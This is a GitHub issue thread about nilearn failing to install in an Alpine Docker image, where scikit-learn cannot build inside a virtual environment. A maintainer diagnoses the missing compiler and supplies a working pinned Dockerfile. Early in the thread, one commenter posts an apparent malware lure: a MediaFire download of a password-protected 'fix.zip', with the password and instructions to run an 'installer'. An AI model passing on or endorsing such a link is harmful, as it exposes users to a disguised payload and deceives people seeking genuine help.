### ISSUE TITLE
Installation failure in docker

### ISSUE THREAD

**Issue by rtward2** [nilearn/nilearn#4512]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Operating system

- [X] Linux
- [ ] Mac
- [ ] Windows

### Operating system version

Alpine (docker)

### Python version

- [X] 3.12
- [ ] 3.11
- [ ] 3.10
- [ ] 3.9
- [ ] 3.8

### nilearn version

Rel0.0.1b

### Expected behavior

I'm building a Docker image and during installation using 
pip install nilearn 
The nilean install was executed after python3 -m venv /ni and ./ni/bin/activation
Expected successful installation.

### Current behavior & error messages

I'm building a Docker image and during installation using 
pip install nilearn 
I received the following error message:
  × Preparing metadata (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [12 lines of output]
      + meson setup /tmp/pip-install-q2pkzf9h/scikit-learn_115fc13238954af6a8071d278aea64f7 /tmp/pip-install-q2pkzf9h/scikit-learn_115fc13238954af6a8071d278aea64f7/.mesonpy-di04z3oy -Dbuildtype=release -Db_ndebug=if-release -Db_vscrt=md --native-file=/tmp/pip-install-q2pkzf9h/scikit-learn_115fc13238954af6a8071d278aea64f7/.mesonpy-di04z3oy/meson-python-native-file.ini
      The Meson build system
      Version: 1.5.1
      Source dir: /tmp/pip-install-q2pkzf9h/scikit-learn_115fc13238954af6a8071d278aea64f7
      Build dir: /tmp/pip-install-q2pkzf9h/scikit-learn_115fc13238954af6a8071d278aea64f7/.mesonpy-di04z3oy
      Build type: native build
      Project name: scikit-learn
      Project version: 1.5.1

The nilean install was executed after python3 -m venv /ni and ./ni/bin/activation

### Steps and code to reproduce bug

python3 -m venv /ni
source  /ni/bin/activate
pip install nilearn

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Remi-Gau** [comment]
can you copy the content of your dockerfile? this may help reproduce the error.

thanks

**Comment by rtward2** [comment]
FROM alpine

ENV PYTHONUNBUffERED=1
RUN apk --update --no-cache add python3 && ln -sf python3 /usr/bin/python
RUN apk add py3-setuptools
RUN apk --update --no-cache add py3-pip
RUN apk --no-cache add py3-scikit-learn
RUN apk --no-cache add py3-scipy
RUN apk --no-cache add py3-numpy
RUN apk --update --no-cache add gcc

RUN python3 -m venv /ni
RUN chmod -R +x /ni
RUN . /ni/bin/activate && pip install --upgrade pip \ 
		&& python3 -m pip install nibabel \
		&& python3 -m pip install pandas \
		&& python3 -m pip install joblib \
		&& python3 -m pip install lxml \
		&& python3 -m pip install packaging \
		&& python3 -m pip install matplotlib \
		&& python3 -m pip install plotly \
		&& pip install nilearn

WORKDIR /home/data

**Comment by rtward2** [comment]
done
________________________________

**Comment by Remi-Gau** [comment]
thanks
let me check that locally

**Comment by Remi-Gau** [comment]
quick question: are you just trying to create a docker image with nilearn and its dependencies?

**Comment by rtward2** [comment]
The intent is to create a docker image that includes scikit-learn and nilearn to be used for image analysis.  The installation of the dependencies was suggested to eliminate the installation issue for nilearn.
________________________________

**Comment by Remi-Gau** [comment]
looks when installing nilearn in a virtual environment you cannot make use of the scikit learn you have installed system wide. 

ans so while trying to install scikit learn in the virtual environment you are missing some compiler to install it

**Comment by Remi-Gau** [comment]
> The intent is to create a docker image that includes scikit-learn and nilearn to be used for image analysis.

I tried and this should do the trick

```dockerfile
# pin the version of the image you are using with a shasum
FROM python:3.12.5-slim-bookworm@sha256:59c7332a4a24373861c4a5f0eec2c92b87e3efeb8ddef011744ef9a751b1d11c

# pin the nilearn version
RUN pip install nilearn[plotly]==0.10.4

WORKDIR /home/data
```

```bash
docker build . -t nilearn
docker run -it --rm --entrypoint /bin/bash nilearn 

root@b8f4c463313c:/home/data# pip list
Package            Version
------------------ -----------
certifi            2024.7.4
charset-normalizer 3.3.2
contourpy          1.3.0
cycler             0.12.1
fonttools          4.53.1
idna               3.8
joblib             1.4.2
kaleido            0.2.1
kiwisolver         1.4.5
lxml               5.3.0
matplotlib         3.9.2
nibabel            5.2.1
nilearn            0.10.4
numpy              2.1.0
packaging          24.1
pandas             2.2.2
pillow             10.4.0
pip                24.2
plotly             5.23.0
pyparsing          3.1.4
python-dateutil    2.9.0.post0
pytz               2024.1
requests           2.32.3
scikit-learn       1.5.1
scipy              1.14.1
setuptools         72.1.0
six                1.16.0
tenacity           9.0.0
threadpoolctl      3.5.0
tzdata             2024.1
urllib3            2.2.2
wheel              0.44.0
```

**Comment by Remi-Gau** [comment]
note that running the image will drop you into the python REPL so if you want to use the image in another way you may need to to change the entrypoint

for example by adding  the following at the end of your dockerfile

```dockerfile
ENTRYPOINT [ "/bin/bash" ]
```

also note that if you really want reproducible docker images, you may also need to pin all the transitive dependencies of nilearn. Let me know, if you want to do this but are not sure how.

**Comment by Remi-Gau** [comment]
@rtward2 I will close this issue but reopen it if you still have problems.
